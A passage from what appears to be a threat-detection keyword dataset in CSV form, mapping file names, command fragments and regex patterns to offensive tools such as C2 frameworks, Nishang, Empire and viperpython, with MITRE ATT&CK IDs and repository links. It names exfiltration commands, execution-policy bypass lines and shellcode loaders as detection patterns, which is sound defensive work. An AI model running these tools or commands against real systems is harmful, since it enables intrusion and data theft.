bypassing EDR active projection DLL by preventing entry point execution","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","0","N/A","10","10","1057","150","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z" "*execute-assembly svchost *.exe*",".{0,1000}execute\-assembly\ssvchost\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*execute-assembly*Seatbelt*",".{0,1000}execute\-assembly.{0,1000}Seatbelt.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*execute-assembly*sharpcookiemonster*",".{0,1000}execute\-assembly.{0,1000}sharpcookiemonster.{0,1000}","offensive_tool_keyword","SharpCookieMonster","This C# project will dump cookies for all sites. even those with httpOnly/secure/session","T1539 - T1606","TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/m0rv4i/SharpCookieMonster","1","1","N/A","N/A","2","197","45","2023-03-15T09:51:09Z","2020-01-22T18:39:49Z" "*execute-assembly*sigflip*",".{0,1000}execute\-assembly.{0,1000}sigflip.{0,1000}","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll.
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","948","175","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "*executeAssembly.nim*",".{0,1000}executeAssembly\.nim.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*execute-assembly.py*",".{0,1000}execute\-assembly\.py.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*Execute-Command-MSSQL*",".{0,1000}Execute\-Command\-MSSQL.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Execute-DNSTXT-Code*",".{0,1000}Execute\-DNSTXT\-Code.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*execute-dotnet-assembly*",".{0,1000}execute\-dotnet\-assembly.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. 
and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*execute-pe svchost whoami.exe*",".{0,1000}execute\-pe\ssvchost\swhoami\.exe.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*execute-pe.py*",".{0,1000}execute\-pe\.py.{0,1000}","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","77","12","2024-04-24T13:23:09Z","2021-01-25T12:36:46Z" "*executepersistence*",".{0,1000}executepersistence.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 
T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","10","10","455","76","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" "*execute-Pezor*",".{0,1000}execute\-Pezor.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*Executes a chosen Mimikatz 
command*",".{0,1000}Executes\sa\schosen\sMimikatz\scommand.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","10","2","178","38","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z" "*Executes a powershell command on the remote host. Requires PSCMD*",".{0,1000}Executes\sa\spowershell\scommand\son\sthe\sremote\shost\.\sRequires\sPSCMD.{0,1000}","offensive_tool_keyword","evilrdp","The evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/skelsec/evilrdp","1","0","N/A","10","10","267","30","2023-12-09T17:10:52Z","2023-11-29T13:44:58Z" "*Executes everything but DCSync - requires admin*",".{0,1000}Executes\severything\sbut\sDCSync\s\-\srequires\sadmin.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","10","2","178","38","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z" "*execute-shellcode.py*",".{0,1000}execute\-shellcode\.py.{0,1000}","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 -
TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","77","12","2024-04-24T13:23:09Z","2021-01-25T12:36:46Z" "*Executing the exploit this may take a while.........................................*",".{0,1000}Executing\sthe\sexploit\sthis\smay\stake\sa\swhile\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..{0,1000}","offensive_tool_keyword","POC","Exploit tool for CVE-2023-4911 targeting the 'Looney Tunables' glibc vulnerability in various Linux distributions.","T1068 - T1210 - T1555","TA0001 - TA0003 - TA0005","N/A","N/A","Exploitation tools","https://github.com/chaudharyarjun/LooneyPwner","1","0","N/A","10","1","38","12","2023-10-18T04:59:50Z","2023-10-17T07:44:16Z" "*Execution_CommandAndScriptingInterpreter_UploadAndExec.py*",".{0,1000}Execution_CommandAndScriptingInterpreter_UploadAndExec\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Execution_UserExecution_CallbackCreateThreadpoolWait.py*",".{0,1000}Execution_UserExecution_CallbackCreateThreadpoolWait\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - 
T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Execution_UserExecution_CallbackCreateTimerQueue.py*",".{0,1000}Execution_UserExecution_CallbackCreateTimerQueue\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Execution_UserExecution_CallbackEnumChildWindows.py*",".{0,1000}Execution_UserExecution_CallbackEnumChildWindows\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Execution_UserExecution_CallbackEnumWindows.py*",".{0,1000}Execution_UserExecution_CallbackEnumWindows\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - 
T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Execution_UserExecution_DirectConnectReverseHTTPS.py*",".{0,1000}Execution_UserExecution_DirectConnectReverseHTTPS\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Execution_UserExecution_DirectConnectReverseTCPRc4.py*",".{0,1000}Execution_UserExecution_DirectConnectReverseTCPRc4\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Execution_UserExecution_FakePPID.py*",".{0,1000}Execution_UserExecution_FakePPID\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet 
penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Execution_UserExecution_LinuxBaseShellcodeLoader.py*",".{0,1000}Execution_UserExecution_LinuxBaseShellcodeLoader\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Execution_UserExecution_LinuxSelfGuardLoader.py*",".{0,1000}Execution_UserExecution_LinuxSelfGuardLoader\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Execution_UserExecution_NtCreateSection.py*",".{0,1000}Execution_UserExecution_NtCreateSection\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the 
tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Execution_UserExecution_Syscall_inject.py*",".{0,1000}Execution_UserExecution_Syscall_inject\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Execution_UserExecution_VSSyscallProject.py*",".{0,1000}Execution_UserExecution_VSSyscallProject\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*-ExecutionPolicy Bypass -File Win10.ps1 *",".{0,1000}\-ExecutionPolicy\sBypass\s\-File\sWin10\.ps1\s.{0,1000}","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security 
distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","0","N/A","N/A","10","6697","1259","2024-04-15T18:31:30Z","2019-03-26T22:36:32Z" "*-ExecutionPolicy Bypass -File Win11.ps1 *",".{0,1000}\-ExecutionPolicy\sBypass\s\-File\sWin11\.ps1\s.{0,1000}","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","0","N/A","N/A","10","6697","1259","2024-04-15T18:31:30Z","2019-03-26T22:36:32Z" "*exegol4thewin*",".{0,1000}exegol4thewin.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*ExegolController.py*",".{0,1000}ExegolController\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*exegol-docker-build*",".{0,1000}exegol\-docker\-build.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*ExegolExceptions.py*",".{0,1000}ExegolExceptions\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*Exegol-images-main*",".{0,1000}Exegol\-images\-main.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*ExegolManager.py*",".{0,1000}ExegolManager\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*ExegolProgress.py*",".{0,1000}ExegolProgress\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" 
"*ExegolPrompt.py*",".{0,1000}ExegolPrompt\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*ExeStager.csproj*",".{0,1000}ExeStager\.csproj.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*ExeToInjectInTo.*",".{0,1000}ExeToInjectInTo\..{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*ExeToLaunch StringToBePutAsCmdline*",".{0,1000}ExeToLaunch\sStringToBePutAsCmdline.{0,1000}","offensive_tool_keyword","FakeCmdLine","Simple demonstration (C source code and compiled .exe) of a less-known (but documented) behavior of CreateProcess() function. 
Effectively you can put any string into the child process Command Line field.","T1059 - T1036","TA0003","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/tree/master/FakeCmdLine","1","0","N/A","N/A","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*ExetoText.ps1*",".{0,1000}ExetoText\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*exfil -regex* -domain*-url * -filepath *",".{0,1000}exfil\s\-regex.{0,1000}\s\-domain.{0,1000}\-url\s.{0,1000}\s\-filepath\s.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","0","N/A","9","1","60","9","2024-04-01T07:49:15Z","2023-12-04T07:05:48Z" "*ExfilDataToGitHub*",".{0,1000}ExfilDataToGitHub.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-ExfilDataToGitHub.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" 